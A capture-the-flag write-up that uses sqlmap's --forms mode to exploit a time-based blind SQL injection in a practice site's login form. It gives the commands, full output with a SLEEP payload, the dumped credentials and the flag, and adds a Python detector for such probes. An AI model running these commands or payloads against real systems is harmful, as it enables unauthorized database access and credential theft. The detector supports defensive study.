
sqlmap learning notes (1. Easy_SQLi (time-based, form injection))

Solution

The challenge hint points to SQL injection. The challenge page contains only a single form, so sqlmap is used to inject through that form.

With the --forms option sqlmap discovers and tests the form automatically, and the flag is retrieved step by step.

### Summary of the options used

| Option | Purpose | Example |
|---|---|---|
| `-u` | Target URL. | |
| `-C` | Column name(s) to target (comma-separated for several). | |
| `-D` | Database name. | |
| `-T` | Table name. | |
| `-r` | Load the request from a file, keeping every request detail; sqlmap identifies the injection point itself. | |
| `--columns` | Enumerate the columns of the given table. | |
| `--tables` | Enumerate the tables of the given database. | |
| `--dump` | Dump the data. | |
| `--dbs` | Enumerate all databases. | `sqlmap -u URL --dbs` |
| `--level` | Test depth (1-5). | `--level 3` (detect Cookie injection) |
| `--risk` | Risk level (1-3). | `--risk 3` (use dangerous statements) |
| `--proxy` | Route traffic through a proxy. | `--proxy="http://127.0.0.1:8080"` |
| `--tamper` | Bypass a WAF. | `--tamper=space2comment` |
| `--forms` | Handle forms automatically: discover them and test them for injection. | |
| `--batch` | No user interaction; pick the default answer for every prompt. | |
| `--current-db` | Retrieve the current database name. | |
| `--dump-all` | Dump all data. | `sqlmap -u URL --dump-all` |
| `--os-shell` | Get an operating-system shell. | `sqlmap -u URL --os-shell` |
```shell
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump
```
```text
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.2#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:18:50 /2025-07-01/

[05:18:50] [INFO] testing connection to the target URL
[05:18:50] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:18:51] [INFO] resuming back-end DBMS 'mysql'
[05:18:51] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0518am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:18:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:18:51] [INFO] fetching current database
[05:18:51] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:18:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[05:19:10] [INFO] adjusting time delay to 1 second due to good response times
qsnctf
current database: 'qsnctf'
```
```text
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:27:27 /2025-07-01/

[05:27:27] [INFO] testing connection to the target URL
[05:27:27] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:27:28] [INFO] resuming back-end DBMS 'mysql'
[05:27:28] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0527am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:27:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:27:28] [INFO] fetching tables for database: 'qsnctf'
[05:27:28] [INFO] fetching number of tables for database 'qsnctf'
[05:27:28] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:27:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:27:37] [INFO] retrieved:
[05:27:47] [INFO] adjusting time delay to 1 second due to good response times
users
Database: qsnctf
[1 table]
+-------+
| users |
+-------+
```
```text
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.2#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:29:34 /2025-07-01/

[05:29:34] [INFO] testing connection to the target URL
[05:29:34] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:29:34] [INFO] resuming back-end DBMS 'mysql'
[05:29:34] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0529am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:29:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:29:35] [INFO] fetching columns for table 'users' in database 'qsnctf'
[05:29:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:29:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:29:53] [INFO] adjusting time delay to 1 second due to good response times
3
[05:29:53] [INFO] retrieved: id
[05:30:01] [INFO] retrieved: int(11)
[05:30:32] [INFO] retrieved: username
[05:31:01] [INFO] retrieved: text
[05:31:20] [INFO] retrieved: password
[05:31:53] [INFO] retrieved: text
Database: qsnctf
Table: users
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
```
```text
┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.2#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:33:55 /2025-07-01/

[05:33:55] [INFO] testing connection to the target URL
[05:33:55] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:33:56] [INFO] resuming back-end DBMS 'mysql'
[05:33:56] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0533am.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:33:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:33:56] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'qsnctf'
[05:33:56] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'qsnctf'
[05:33:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:33:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[05:34:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[05:34:18] [INFO] adjusting time delay to 1 second due to good response times
1
[05:34:20] [INFO] retrieved: 123456
[05:34:41] [INFO] retrieved: admin
[05:34:59] [INFO] retrieved: 2
[05:35:03] [INFO] retrieved: flag{ca74d097080346969f41c257318a7411}
[05:37:45] [INFO] retrieved: user
Database: qsnctf
Table: users
[2 entries]
+----+----------------------------------------+----------+
| id | password                               | username |
+----+----------------------------------------+----------+
| 1  | 123456                                 | admin    |
| 2  | flag{ca74d097080346969f41c257318a7411} | user     |
+----+----------------------------------------+----------+
```
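As an added defender-side example (not part of the original writeup), the Python below scans application request logs for the trace the four runs above leave behind: a DBMS delay primitive such as `SLEEP()` inside a POST body, and repeated slow responses from one client to one form. The log format and the sample lines are constructed for illustration; the second line carries the exact payload sqlmap reported above.

```python
"""Detect time-based blind SQL injection probes (sqlmap-style SLEEP payloads)
in application request logs. Added example, not part of the original writeup;
the log format and sample lines below are constructed for illustration."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log: "<time> <client> <method> <path> <status> <seconds> <body>"
SAMPLE_LOG = """\
05:18:50 10.0.0.5 POST /login.php 200 0.012 uname=admin&psw=secret
05:18:51 10.0.0.9 POST /login.php 200 5.031 uname=1%27%20AND%20%28SELECT%208158%20FROM%20%28SELECT%28SLEEP%285%29%29%29OZHS%29%20AND%20%27yCGe%27%3D%27yCGe&psw=1
05:18:57 10.0.0.9 POST /login.php 200 0.015 uname=1%27%20AND%20%28SELECT%208158%20FROM%20%28SELECT%28SLEEP%280%29%29%29OZHS%29%20AND%20%27yCGe%27%3D%27yCGe&psw=1
05:19:10 10.0.0.9 POST /login.php 200 1.020 uname=1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%281%29%29%29x%29%20AND%20%27a%27%3D%27a&psw=1
05:19:12 10.0.0.5 POST /login.php 200 0.011 uname=user&psw=hunter2
"""

# Delay primitives sqlmap relies on for time-based blind tests across DBMSs
DELAY_RE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR\s+DELAY)\b", re.I)
SLOW_SECONDS = 1.0          # a response at or above this counts as "delayed"

def parse_line(line):
    ts, client, method, path, status, rt, body = line.split(" ", 6)
    return {"ts": ts, "client": client, "method": method, "path": path,
            "status": int(status), "rt": float(rt), "body": unquote_plus(body)}

def find_delay_payloads(log_text):
    """Return (client, path, decoded body) for every request carrying a delay primitive."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if DELAY_RE.search(rec["body"]):
            hits.append((rec["client"], rec["path"], rec["body"]))
    return hits

def slow_request_clients(log_text, min_slow=2):
    """Clients with at least min_slow delayed responses to one form: the timing
    signature of a blind probe even when the payload text itself is obfuscated."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec["rt"] >= SLOW_SECONDS:
            counts[(rec["client"], rec["path"])] += 1
    return {k: v for k, v in counts.items() if v >= min_slow}

if __name__ == "__main__":
    for hit in find_delay_payloads(SAMPLE_LOG):
        print("delay payload:", hit)
    print("slow clients:", slow_request_clients(SAMPLE_LOG))
```

The timing heuristic still fires when `--tamper` rewrites the payload so the keyword check misses it; the fix for a `login.php` like this one is a parameterized query so that `uname` is never concatenated into SQL.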

http://www.lryc.cn/news/578350.html
